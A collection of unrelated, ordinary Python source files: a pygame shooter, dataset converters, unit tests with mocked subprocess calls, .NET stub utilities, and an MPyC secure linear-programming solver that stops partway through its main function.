class Container(object):
""" Holds hashable objects. Objects may occur 0 or more times """
def __init__(self):
""" Creates a new container with no objects in it. I.e., any object
occurs 0 times in self. """
self.vals = {}
def insert(self, e):
""" assumes e is hashable
Increases the number times e occurs in self by 1. """
try:
self.vals[e] += 1
except:
self.vals[e] = 1
def __str__(self):
s = ""
for i in sorted(self.vals.keys()):
if self.vals[i] != 0:
s += str(i)+":"+str(self.vals[i])+"\n"
return s
class Bag(Container):
def remove(self, e):
""" assumes e is hashable
If e occurs in self, reduces the number of
times it occurs in self by 1. Otherwise does nothing. """
# print(e, self.vals)
if e in self.vals:
self.vals[e] -= 1
def count(self, e):
""" assumes e is hashable
Returns the number of times e occurs in self. """
try:
return self.vals[e]
except:
return 0
# d1 = Bag()
# d1.insert(4)
# d1.insert(4)
# print(d1)
# d1.remove(2)
# print(d1)
d1 = Bag()
d1.insert(4)
d1.insert(4)
d1.insert(4)
print(d1)
d1.remove(4)
print(d1)
print(d1.count(2))
print(d1.count(4))
d1 = Bag()
d1.insert(4)
d1.insert(4)
d1.insert(4)
print(d1.count(2))
print(d1.count(4))
|
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import PiratesGuiGlobals
import types
class ButtonListItem(DirectButton):
def __init__(self, item, itemHeight, itemWidth, parent=None, parentList=None, textScale=None, txtColor=None, **kw):
optiondefs = (
(
'state', DGG.NORMAL, None), ('image', None, None), ('image_scale', (0.24, 0.22, 0.22), None), ('image_pos', (0.185, 0, 0.043), None), ('frameColor', (0.1, 0.1, 1, 0.08), None), ('borderWidth', PiratesGuiGlobals.BorderWidth, None), ('frameSize', (0.0, itemWidth, 0.0, itemHeight), None))
self.defineoptions(kw, optiondefs)
DirectButton.__init__(self, parent)
self.initialiseoptions(ButtonListItem)
self.textScale = textScale
if not self.textScale:
self.textScale = PiratesGuiGlobals.TextScaleLarge
self.item = item.get('Text')
self.descText = None
self.valueTexts = []
self.textColor = txtColor
if not self.textColor:
self.textColor = PiratesGuiGlobals.TextFG1
self.parentList = parentList
self.value = item.get('Value')
self.defaultColorScale = (0.75, 0.75, 0.75, 1)
self.setColorScale(*self.defaultColorScale)
self.prevImageScale = None
self.locked = False
return
def setup(self):
self._createIface()
def destroy(self):
self._destroyIface()
self.parentList = None
DirectButton.destroy(self)
self.ignoreAll()
return
def _createIface(self):
if type(self.item) is types.ListType:
itemText = self.item[0]
else:
itemText = self.item
self['text'] = itemText
self['text_scale'] = self.textScale
self['text_fg'] = self.textColor
self['text_pos'] = (self.getWidth() / 2, 0.025)
self.prevImageScale = self['image_scale']
def _destroyIface(self):
pass
def _handleItemChange(self):
self._destroyIface()
self._createIface()
def commandFunc(self, event):
DirectButton.commandFunc(self, event)
if not self.locked:
self.parentList.itemSelect(self)
def setSelected(self, selected):
self.selected = selected
if selected:
self.setColorScale(1, 1, 1, 1)
self.prevImageScale = self['image_scale']
self['image_scale'] = (0.25, 0.23, 0.23)
else:
self.setColorScale(*self.defaultColorScale)
self['image_scale'] = self.prevImageScale
|
from .is_file import is_file
from .is_string import is_string
|
import glob
import pandas as pd
from statistics import stdev
CSV_DIRECTORY = "Concussion Subject Data/*"
PROCESSED_CSV_TITLE = "processed_data"
FILES = glob.glob(f"{CSV_DIRECTORY}/*.csv")
DATAFRAMES = [pd.read_csv(filename) for filename in FILES]
def abs_diff(dataframe, column_name: str) -> list:
"""Return the absolute difference of values
between each row in a given column.
"""
column_data = dataframe[column_name].tolist()
abs_diff_column = []
for i in range(1, len(column_data)):
abs_diff = abs(column_data[i] - column_data[i - 1])
abs_diff_column.append(abs_diff)
return abs_diff_column
def get_results(column_name: str):
abs_diff_sum = []
standard_deviation = []
for frame in DATAFRAMES:
frame = abs_diff(frame, column_name)
abs_diff_sum.append(sum(frame))
standard_deviation.append(stdev(frame))
return abs_diff_sum, standard_deviation
CoPx_abs_diff_sum, CoPx_abs_diff_stdev = get_results("CoPx")
CoPy_abs_diff_sum, CoPy_abs_diff_stdev = get_results("CoPy")
subject, filename, condition, trial_number = ([] for _ in range(4))
for file_name in sorted(FILES):
file_name = file_name.rsplit('/', 1)[-1].split('.')[0].split('_', 1)[-1]
filename.append(file_name)
subject.append(file_name.split('_', 1)[0])
condition.append(file_name.rsplit('_', 1)[0].split('_', 1)[-1])
trial_number.append(
''.join(s for s in file_name.split('_') if s.isdigit()))
columns = {
'Subject': subject, 'Condition': condition, 'Trial No.': trial_number,
'CoPx Excursion': CoPx_abs_diff_sum, 'CoPx SD': CoPx_abs_diff_stdev,
'CoPy Excursion': CoPy_abs_diff_sum, 'CoPy SD': CoPy_abs_diff_stdev
}
new_dataframe = pd.DataFrame()
for column_name, column_data in columns.items():
new_dataframe[column_name] = column_data
new_dataframe.to_csv(f"{CSV_DIRECTORY.split('/')[0]}/{PROCESSED_CSV_TITLE}.csv",
index=False, index_label=False)
|
'''Setup all relevant packages.'''
from . import utils
from . import statements
from . import profile
from . import indicators
from . import prices
|
from time import time
import numpy as np
import scipy.io as sio
from os.path import join
from tqdm import tqdm
from converter.tfrecord_converter import TFRecordConverter, DataSetConfig, DataSetSplit
class MpiiConverter(TFRecordConverter):
def __init__(self):
self.num_kps = 16
self.mpii_order = ['ankle_r', 'knee_r', 'hip_r', 'hip_l', 'knee_l', 'ankle_l', 'pelvis', 'thorax', 'neck',
'brain', 'wrist_r', 'elbow_r', 'shoulder_r', 'shoulder_l', 'elbow_l', 'wrist_l']
super().__init__()
def prepare_data(self):
print('loading annotations into memory...')
ann_path = join(self.data_dir, 'annotations', 'mpii_human_pose_v1_u12_1.mat')
annotations = sio.loadmat(ann_path, struct_as_record=False, squeeze_me=True)['RELEASE']
ids = np.array(range(len(annotations.annolist)))
train_indices = annotations.img_train.astype(bool)
train_ids = ids[train_indices]
self.data_set_splits.append(self.create_dataset_split(annotations, train_ids, 'train'))
# can't use testing set because ground truth is not available, only generate for submission purpose
# val_indices = np.logical_not(train_indices)
# val_ids = ids[val_indices]
# self.data_set_splits.append(self.create_dataset_split(annotations, val_ids, 'val'))
def create_dataset_split(self, annotations, img_ids, name):
def convert_vis(value):
if type(value) == int or (type(value) == str and value in ['1', '0']):
return int(value)
elif isinstance(value, np.ndarray):
return int(value.size != 0)
else:
return 0
images, kps_2d, vis = [], [], []
img_dir = join(self.data_dir, 'images')
print("prepare {} mpii annotations for conversion".format(name))
for img_id in tqdm(img_ids):
try:
ann_info = annotations.annolist[img_id]
single_persons = annotations.single_person[img_id]
if not isinstance(single_persons, np.ndarray):
single_persons = np.array([single_persons])
if single_persons.size == 0:
continue
rects = ann_info.annorect
if not isinstance(rects, np.ndarray):
rects = np.array([rects])
persons = rects[single_persons - 1]
for person in persons:
points = person.annopoints.point
if not isinstance(points, np.ndarray):
# There is only one! so ignore this image
continue
kp2d = np.zeros((self.num_kps, 2), np.float32)
v = np.zeros((self.num_kps,), np.float32)
for p in points:
kp2d[p.id] = [p.x, p.y]
v[p.id] = convert_vis(p.is_visible)
images.append(join(img_dir, ann_info.image.name))
kps_2d.append(kp2d)
vis.append(v)
except (AttributeError, TypeError):
print('error')
continue
images = np.asarray(images)
kps_2d = np.asarray(kps_2d, dtype=np.float32)
vis = np.asarray(vis, dtype=np.int64)
mpii_config = DataSetConfig(name, False, self.mpii_order)
return DataSetSplit(mpii_config, images, kps_2d, vis)
if __name__ == '__main__':
t0 = time()
mpii_converter = MpiiConverter()
print('Done (t={})\n\n'.format(time() - t0))
|
from pygame import *
from random import randint
window = display.set_mode((700,500))
background = transform.scale(image.load("galaxy.jpg"),(700,500))
class GameSprite(sprite.Sprite):
def __init__(self, player_image,x,y,size_x,size_y,speed):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(player_image),(size_x,size_y))
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.speed = speed
def render(self):
window.blit(self.image,(self.rect.x,self.rect.y))
class player(GameSprite):
def update(self):
keys = key.get_pressed()
if keys[K_LEFT]:
self.rect.x -= self.speed
if keys[K_RIGHT]:
self.rect.x += self.speed
def fire(self):
bullet = Bullet("bullet.png",self.rect.centerx , self.rect.top,15,20,10)
bullets.add(bullet)
killed = 0
lost = 0
class Enemy(GameSprite):
def update(self):
global lost
self.rect.y += self.speed
if self.rect.y > 500:
lost += 1
print(lost)
self.rect.y = 0
self.rect.x = randint(40, 660)
player = player("rocket.png", 250, 400, 80, 100, 10)
enemies = sprite.Group()
bullets = sprite.Group()
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
class Bullet(GameSprite):
def update(self):
self.rect.y -= self.speed
if self.rect.y < 0 :
self.kill()
game = True
clock = time.Clock()
font.init()
font_1 = font.Font(None, 24)
font_2 = font.Font(None, 80)
font_3 = font.Font(None, 48)
font_4 = font.Font(None, 48)
win = font_2.render("ТЫ ПОБЕДИЛ" , True, (255,255,255))
lose = font_2.render("ТЫ ПРОИГРАЛ", True, (180, 0, 0))
#player = player("rocket.png", 250, 400, 80, 100, 10)
restart_button = GameSprite("restart.png",210,250,200,100,0)
while game:
for e in event.get():
if e.type == QUIT:
game = False
if e.type == KEYDOWN:
if e.key == K_SPACE:
player.fire()
collide = sprite.groupcollide(enemies, bullets, True, True)
for c in collide:
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
killed += 1
window.blit(background,(0,0))
lost_text = font_3.render(str(lost), False, (255,255,255))
killed_text = font_3.render(str(killed), False, (255,255,255))
window.blit(lost_text, (10, 10))
window.blit(killed_text, (10, 40))
if lost >= 10:
window.blit(lose, (150,200))
restart_button.render()
for e in enemies:
e.kill()
if sprite.spritecollide(restart_button,bullets,True):
lost = 0
killed = 0
time.delay(500)
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
if killed >= 100:
window.blit(win, (150,200))
restart_button.render()
for e in enemies:
e.kill()
if sprite.spritecollide(restart_button,bullets,True):
lost = 0
killed = 0
time.delay(500)
for i in range(1 , 6):
enemy1 = Enemy("ufo.png", randint(40, 660) , 0 , 80, 50, randint(1,3))
enemies.add(enemy1)
player.update()
player.render()
enemies.update()
enemies.draw(window)
bullets.draw(window)
bullets.update()
display.update()
clock.tick(48)
|
import pytest
from energytechnomodels import Bath
@pytest.fixture()
def fix_create():
b = Bath(2.7, 2.7, t_bath_init=50.0)
b.p_heat = 50E3
b.step(2, "hours")
return b
def test_bath_step(fix_create):
b = fix_create
assert round(b.t_bath, 2) == 81.88
|
#!/usr/bin/env python3
#
# utils.py
"""
General utility functions.
"""
#
# Copyright © 2020 Dominic Davis-Foster <dominic@davis-foster.co.uk>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#
# stdlib
import re
import string
from typing import Iterable, Iterator, List, Optional, Tuple, Type
# 3rd party
from domdf_python_tools.stringlist import StringList
from domdf_python_tools.words import alpha_sort, ascii_digits
from isort import Config # type: ignore
from orderedset import OrderedSet # type: ignore
# this package
from dotnet_stub_builder.type_conversion import Converter
__all__ = [
"dedup",
"is_dunder",
"get_signature",
"make_property",
"get_child_attrs",
"method_alphabet",
"SKIP_ATTRS",
"isort_config",
"SYSTEM_MODULES",
]
def dedup(iterable: Iterable[str]) -> List:
"""
Return the given iterable sans duplicates.
:param iterable:
"""
return list(OrderedSet(iterable))
def is_dunder(attr_name: str) -> bool:
"""
Retuns whether the given attr is a magic/dunder method.
:param attr_name:
"""
return attr_name.startswith("__") and attr_name.endswith("__")
def get_signature(
obj: Type,
obj_name: str,
converter: Converter,
) -> Tuple[str, Optional[str]]:
"""
Returns the signature of the given object, as a two element tuple of return type and arguments.
:param obj:
:param obj_name:
:param converter:
"""
return_type: str = "Any"
arguments: Optional[str] = None
doc: Optional[str] = obj.__doc__
if doc in {int.__doc__, str.__doc__}:
doc = None
if doc:
for line in doc.splitlines():
m = re.match(fr"^(.*) {obj_name}\((.*)\)", line.strip())
if m:
csharp_return_type = m.group(1)
return_type = converter.convert_type(csharp_return_type)
arguments = m.group(2)
return return_type, arguments
def make_property(buf: StringList, name: str) -> None:
"""
Add the signature of a property to the given
:class:`domdf_python_tools.stringlist.StringList`.
:param buf:
:param name:
""" # noqa: D400
with buf.with_indent_size(buf.indent_size + 1):
buf.blankline(ensure_single=True)
buf.append(f"@property\ndef {name}(self): ...")
buf.blankline(ensure_single=True)
with buf.with_indent_size(buf.indent_size + 1):
buf.blankline(ensure_single=True)
buf.append(f"@{name}.setter\ndef {name}(self, value): ...")
buf.blankline(ensure_single=True)
def get_child_attrs(obj: Type) -> Iterator[str]:
"""
Returns a list of child attributes for the given object.
:param obj:
"""
child_attrs = dir(obj)
if "__init__" not in child_attrs:
child_attrs.append("__init__")
for child_attr_name in alpha_sort(child_attrs, alphabet=method_alphabet):
if not is_dunder(child_attr_name) or child_attr_name == "__init__":
if child_attr_name not in SKIP_ATTRS:
yield child_attr_name
isort_config = Config(force_single_line=True)
method_alphabet = f"_{string.ascii_uppercase}{string.ascii_lowercase}{ascii_digits}"
SYSTEM_MODULES = [
"System",
"System.Collections",
"System.ComponentModel",
"System.Configuration",
"System.Configuration.Assemblies",
"System.Data",
"System.Globalization",
"System.IO",
"System.Reflection",
"System.Runtime",
"System.Runtime.CompilerServices",
"System.Runtime.InteropServices",
"System.Runtime.Remoting",
"System.Runtime.Serialization",
"System.Security",
"System.Security.AccessControl",
"System.Security.Cryptography",
"System.Security.Cryptography.X509Certificates",
"System.Security.Policy",
"System.Security.Principal",
"System.Threading",
"System.Threading.Tasks",
"System.Xml",
"System.Xml.Schema",
"System.Xml.Serialization",
]
SKIP_ATTRS = {
"None",
"value__",
"AttrsImpl",
"ClassImpl",
"DefaultValueImpl",
"MemberImpl",
"NameImpl",
"PositionImpl",
}
|
##########################################################################
# NSAp - Copyright (C) CEA, 2016
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Mocking Popen directly - need to construct a Mock to return, and adjust its
communicate() return_value.
The benefit of this approach is in not needing to do the strip/split on your
fake return string.
"""
# System import
import unittest
import sys
import os
import copy
# COMPATIBILITY: since python 3.3 mock is included in unittest module
python_version = sys.version_info
if python_version[:2] <= (3, 3):
import mock
from mock import patch
else:
import unittest.mock as mock
from unittest.mock import patch
# pyConnectomist import
from pyconnectomist.tractography.model import dwi_local_modeling
from pyconnectomist.tractography.model import export_scalars_to_nifti
from pyconnectomist.exceptions import ConnectomistBadFileError
from pyconnectomist.exceptions import ConnectomistError
class ConnectomistDWIModel(unittest.TestCase):
""" Test the Connectomist 'Local modeling' tab:
'pyconnectomist.tractography.model.dwi_local_modeling'
"""
def setUp(self):
""" Run before each test - the mock_popen will be available and in the
right state in every test<something> function.
"""
# Mocking popen
self.popen_patcher = patch("pyconnectomist.wrappers.subprocess.Popen")
self.mock_popen = self.popen_patcher.start()
mock_process = mock.Mock()
attrs = {
"communicate.return_value": ("mock_OK", "mock_NONE"),
"returncode": 0
}
mock_process.configure_mock(**attrs)
self.mock_popen.return_value = mock_process
self.kwargs = {
"outdir": "/my/path/mock_outdir",
"registered_dwi_dir": "/my/path/mock_regitereddwidir",
"eddy_motion_dir": "/my/path/mock_eddydir",
"rough_mask_dir": "/my/path/mock_maskdir",
"subject_id": "Lola",
"model": "aqbi",
"order": 4,
"aqbi_laplacebeltrami_sharpefactor": 0.0,
"regularization_lccurvefactor": 0.006,
"dti_estimator": "linear",
"constrained_sd": False,
"sd_kernel_type": "symmetric_tensor",
"sd_kernel_lower_fa": 0.65,
"sd_kernel_upper_fa": 0.85,
"sd_kernel_voxel_count": 300,
"rgbscale": 1.0,
"path_connectomist": "/my/path/mock_connectomist"
}
def tearDown(self):
""" Run after each test.
"""
self.popen_patcher.stop()
@mock.patch("os.path")
def test_badfileerror_raise(self, mock_path):
""" A bad input file -> raise ConnectomistBadFileError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [False, True, True, True, True]
# Test execution
self.assertRaises(ConnectomistBadFileError, dwi_local_modeling,
**self.kwargs)
@mock.patch("os.path")
def test_modelerror_raise(self, mock_path):
""" A bad model -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["model"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_estimatorerror_raise(self, mock_path):
""" A bad estimator -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["dti_estimator"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_constrainedsderror_raise(self, mock_path):
""" A bad constrained_sd value -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["constrained_sd"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_kernelerror_raise(self, mock_path):
""" A bad kernel -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["sd_kernel_type"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("pyconnectomist.tractography.model.ConnectomistWrapper."
"_connectomist_version_check")
@mock.patch("pyconnectomist.tractography.model.ConnectomistWrapper."
"create_parameter_file")
@mock.patch("os.path")
def test_normal_execution(self, mock_path, mock_params, mock_version):
""" Test the normal behaviour of the function.
"""
# Set the mocked functions returned values
mock_params.return_value = "/my/path/mock_parameters"
mock_path.join.side_effect = lambda *x: x[0] + "/" + x[1]
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
outdir = dwi_local_modeling(**self.kwargs)
self.assertEqual(outdir, self.kwargs["outdir"])
self.assertEqual(len(mock_params.call_args_list), 1)
self.assertEqual(len(self.mock_popen.call_args_list), 2)
self.assertEqual([
mock.call(self.kwargs["eddy_motion_dir"],
"dw_wo_eddy_current_and_motion.ima"),
mock.call(self.kwargs["rough_mask_dir"], "mask.ima"),
mock.call(self.kwargs["registered_dwi_dir"], "t1.ima"),
mock.call(self.kwargs["eddy_motion_dir"],
"t2_wo_eddy_current_and_motion.ima"),
mock.call(self.kwargs["registered_dwi_dir"], "dw_to_t1.trm")],
mock_path.join.call_args_list)
self.assertEqual([
mock.call(os.path.join(self.kwargs["eddy_motion_dir"],
"dw_wo_eddy_current_and_motion.ima")),
mock.call(os.path.join(self.kwargs["rough_mask_dir"],
"mask.ima")),
mock.call(os.path.join(self.kwargs["registered_dwi_dir"],
"t1.ima")),
mock.call(os.path.join(self.kwargs["eddy_motion_dir"],
"t2_wo_eddy_current_and_motion.ima")),
mock.call(os.path.join(self.kwargs["registered_dwi_dir"],
"dw_to_t1.trm"))],
mock_path.isfile.call_args_list)
class ConnectomistModelExport(unittest.TestCase):
""" Test the Connectomist 'Local modeling' tab Nifti export:
'pyconnectomist.tractography.model.export_scalars_to_nifti'
"""
def setUp(self):
""" Define Function parameters.
"""
self.kwargs = {
"model_dir": "/my/path/mock_modeldir",
"model": "qba",
"outdir": "/my/path/mock_outdir"
}
@mock.patch("pyconnectomist.tractography.model.ptk_gis_to_nifti")
@mock.patch("pyconnectomist.tractography.model.os.path.isdir")
@mock.patch("pyconnectomist.tractography.model.os.path.isfile")
@mock.patch("pyconnectomist.tractography.model.os.mkdir")
def test_normal_execution(self, mock_mkdir, mock_isfile, mock_isdir,
mock_conversion):
""" Test the normal behaviour of the function.
"""
# Set the mocked functions returned values
mock_isfile.side_effect = [True, True, False, False, False, False,
False]
mock_isdir.side_effect = [False]
mock_conversion.side_effect = lambda *x: x[-1]
# Test execution
outfiles = export_scalars_to_nifti(**self.kwargs)
expected_outfiles = {
"gfa": os.path.join(
self.kwargs["outdir"],
"{0}_gfa.nii.gz".format(self.kwargs["model"])),
"mean_diffusivity": os.path.join(
self.kwargs["outdir"],
"{0}_mean_diffusivity.nii.gz".format(self.kwargs["model"]))}
expected_files = []
for name in ("gfa", "mean_diffusivity", "adc", "lambda_parallel",
"lambda_transverse", "fa"):
expected_files.append(
os.path.join(
self.kwargs["model_dir"],
"{0}_{1}.ima".format(self.kwargs["model"], name)))
self.assertEqual(expected_outfiles, outfiles)
self.assertEqual([mock.call(self.kwargs["outdir"])],
mock_isdir.call_args_list)
self.assertEqual([mock.call(self.kwargs["outdir"])],
mock_mkdir.call_args_list)
self.assertEqual([mock.call(elem) for elem in expected_files],
mock_isfile.call_args_list)
self.assertEqual([
mock.call(expected_files[0], expected_outfiles["gfa"]),
mock.call(expected_files[1],
expected_outfiles["mean_diffusivity"])],
mock_conversion.call_args_list)
if __name__ == "__main__":
unittest.main()
|
import sys
def opposite(number):
return number * (-1)
if __name__ == "__main__":
if len(sys.argv) == 2:
print(opposite(number=int(sys.argv[1])))
else:
sys.exit(1)
|
from setuptools import setup, find_packages
setup(
name='jsonpkt',
packages=find_packages(),
version='0.0.1',
author='Keito Osaki',
author_email='o.keito317@icloud.com',
)
|
import pytest
from xclingo.preprocessor._utils import translate_show_all, translate_trace_all, translate_trace
class TestUtils:
def test_translate_trace_all(self, datadir):
input_text = (datadir / 'test_trace_all_input').read_text()
expected_text = (datadir / 'test_trace_all_output').read_text()
translated = translate_trace_all(input_text)
assert expected_text == translated
def test_translate_show_all(self, datadir):
input_text = (datadir / 'test_show_all_input').read_text()
expected_text = (datadir / 'test_show_all_output').read_text()
translated = translate_show_all(input_text)
assert expected_text == translated
def test_translate_trace(self, datadir):
input_text = (datadir / 'test_trace_input').read_text()
expected_text = (datadir / 'test_trace_output').read_text()
translated = translate_trace(input_text)
print(translated)
print('--------')
print(expected_text)
assert expected_text == translated
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 28 08:12:43 2020
@author: cis-user
"""
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# a=max(s)
# print(a)
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# a=min(s)
# print(a)
# score=['wang',5,9,6,8,7,10,6]
# s=score[1:]
# y= sorted(s,reverse=True)
# a,b,c,d,e,f,g=y
# print(y[0:3])
# score=['wang',5,9,6,8,7,10,6]
# s=score[1:]
# y= sorted(s,reverse=True)
# a,b,c,d,e,f,g=y
# print(y[4:7])
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# x=sum(s)/len(s)
# print(x)
# for i in range(1,10):
# for j in range(1,10):
# print('{}x{}={}\t'.format(j,i,f'{i*j:>2}'),end='')
# print()
# string='I LOVE YOU'
# import random as i
# a=i.randint(1,100)
# for b in range(a):
# c=' so'*b+' much'
# print(string,c)
|
"""Demo Linear Programming (LP) solver.
The LP solver returns a solution to the following problem.
Given m x n matrix A, length-m vector b >=0, and length-n vector c.
Find a length-n vector x minimizing c.x subject to A x <= b and x >= 0.
The small (or, condensed) tableau variant of the Simplex algorithm is used.
The entries of A, b, and c are all assumed to be integral. Since b >= 0,
the all-zero vector x=0 is a feasible solution. It is also assumed that
a solution exists (hence that the problem is not unbounded).
The solution x is in general not integral. As a certificate of optimality,
a solution y to the dual problem is computed as well, that is, y is a
length-m vector maximizing b.y subject to y A >= c and y >= 0. The solutions
are represented by integer vectors, and one additional number, which is the
common denominator of all entries of the solution vectors.
"""
import os
import logging
import argparse
from mpyc.runtime import mpc
def load_tableau(filename):
T = []
comment_sign = '#'
sep = ','
with open(os.path.join('data', 'lp', filename + '.csv'), 'r') as f:
for line in f:
# strip comments and whitespace and skip empty lines
line = line.split(comment_sign)[0].strip()
if line:
T.append(list(map(int, line.split(sep))))
T[-1].append(0)
return T
def pow_list(a, x, n):
if n == 1:
return [a]
even = pow_list(a, x**2, (n+1)//2)
if n%2 == 1:
d = even.pop()
odd = mpc.scalar_mul(x, even)
xs = [None] * n
for i in range(n//2):
xs[2*i] = even[i]
xs[2*i+1] = odd[i]
if n%2 == 1:
xs[-1] = d
return xs
def argmin(x, arg_le):
n = len(x)
if n == 1:
return ([1], x[0])
if n == 2:
b, m = arg_le(x[0], x[1])
return ([1 - b, b], m)
b2 = [None] * (n//2)
m2 = [None] * ((n+1)//2)
for i in range(n//2):
b2[i], m2[i] = arg_le(x[2*i], x[2*i+1])
if n%2 == 1:
m2[-1] = x[-1]
a2, m = argmin(m2, arg_le)
a = [None] * n
if n%2 == 1:
a[-1] = a2.pop()
b2 = mpc.schur_prod(b2, a2)
for i in range(n//2):
a[2*i] = a2[i] - b2[i]
a[2*i+1] = b2[i]
return a, m
def argmin_int(xs):
def arg_le_int(x0, x1):
a = x0 >= x1
m = x0 + a * (x1 - x0)
return a, m
return argmin(xs, arg_le_int)
def argmin_rat(xs):
def arg_le_rat(x0, x1):
(n0, d0) = x0
(n1, d1) = x1
a = mpc.in_prod([n0, d0], [d1, -n1]) >= 0
h = mpc.scalar_mul(a, [n1 - n0, d1 - d0])
m = (h[0] + n0, h[1] + d0)
return a, m
return argmin(xs, arg_le_rat)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', help='Filename for tableau.')
parser.add_argument('options', nargs='*')
parser.set_defaults(data='default')
args = parser.parse_args(mpc.args)
if not args.options:
certificate_filename = 'c' + str(mpc.id) + '.cert'
logging.info('Setting certificate file to default = %s', certificate_filename)
else:
certificate_filename = args.options[0]
T = load_tableau(args.data)
l = mpc.options.bit_length
m = len(T) - 1
n = len(T[0]) - 1
secint = mpc.SecInt(l, m + n)
for i in range(len(T)):
for j in range(len(T[0])):
T[i][j] = secint(T[i][j])
Zp = secint.field
p = Zp.modulus
N = Zp.nth
w = Zp.root
w_powers = [Zp(1)]
for _ in range(N - 1):
w_powers.append(w_powers[-1] * w)
assert w_powers[-1] * w == 1
basis = [secint(w_powers[-(i+n)]) for i in range(m)]
cobasis = [secint(w_powers[-j]) for j in range(n)]
prev_pivot = secint(1)
mpc.start()
iteration = 0
logging.info('%d Termination?...', iteration)
p_col_index, minimum = argmin_int(T[-1][:-1])
while mpc.run(mpc.output(minimum < 0)):
iteration += 1
logging.info('%d Determining pivot...', iteration)
p_col = mpc.matrix_prod([p_col_index], T, True)[0]
constraints = [(T[i][-1] + (p_col[i] <= 0), p_col[i]) for i in range(m)]
p_row_index, (_, pivot) = argmin_rat(constraints)
logging.info('%d Updating tableau...', iteration)
# T[i,j] = T[i,j]*p/p' - (C[i]/p' - p_row_index[i])*(R[j] + p * p_col_index[j])
p_row = mpc.matrix_prod([p_row_index], T)[0]
delta_row = mpc.scalar_mul(prev_pivot, p_col_index)
delta_row.append(secint(0))
p_row = mpc.vector_add(p_row, delta_row)
prev_p_inv = 1 / prev_pivot
p_col = mpc.scalar_mul(prev_p_inv, p_col)
p_col = mpc.vector_sub(p_col, p_row_index + [secint(0)])
T = mpc.gauss(T, pivot * prev_p_inv, p_col, p_row)
prev_pivot = pivot
# swap basis entries
delta = mpc.in_prod(basis, p_row_index) - mpc.in_prod(cobasis, p_col_index)
p_row_index = mpc.scalar_mul(delta, p_row_index)
basis = mpc.vector_sub(basis, p_row_index)
p_col_index = mpc.scalar_mul(delta, p_col_index)
cobasis = mpc.vector_add(cobasis, p_col_index)
logging.info('%d Termination?...', iteration)
p_col_index, minimum = argmin_int(T[-1][:-1])
mpc.run(mpc.barrier())
logging.info('Termination...')
mx = mpc.run(mpc.output(T[-1][-1]))
cd = mpc.run(mpc.output(prev_pivot))
print(' max(f) = %d / %d = %f' % (mx.value, cd.value, float(mx.value)/cd.value))
logging.info('Computing solution...')
sum_x_powers = [secint(0) for _ in range(N)]
for i in range(m):
x_powers = pow_list(T[i][-1] / N, basis[i], N)
sum_x_powers = mpc.vector_add(sum_x_powers, x_powers)
solution = [None] * n
for j in range(n):
coefs = [w_powers[(j*k)%N] for k in range(N)]
solution[j] = mpc.lin_comb(coefs, sum_x_powers)
solution = mpc.run(mpc.output(solution))
logging.info('Computing dual solution...')
sum_x_powers = [secint(0) for _ in range(N)]
for j in range(n):
x_powers = pow_list(T[-1][j] / N, cobasis[j], N)
sum_x_powers = mpc.vector_add(sum_x_powers, x_powers)
dual_solution = [None] * m
for i in range(m):
coefs = [w_powers[((n+i)*k)%N] for k in range(N)]
dual_solution[i] = mpc.lin_comb(coefs, sum_x_powers)
dual_solution = mpc.run(mpc.output(dual_solution))
mpc.shutdown()
logging.info('Writing output to %s.', certificate_filename)
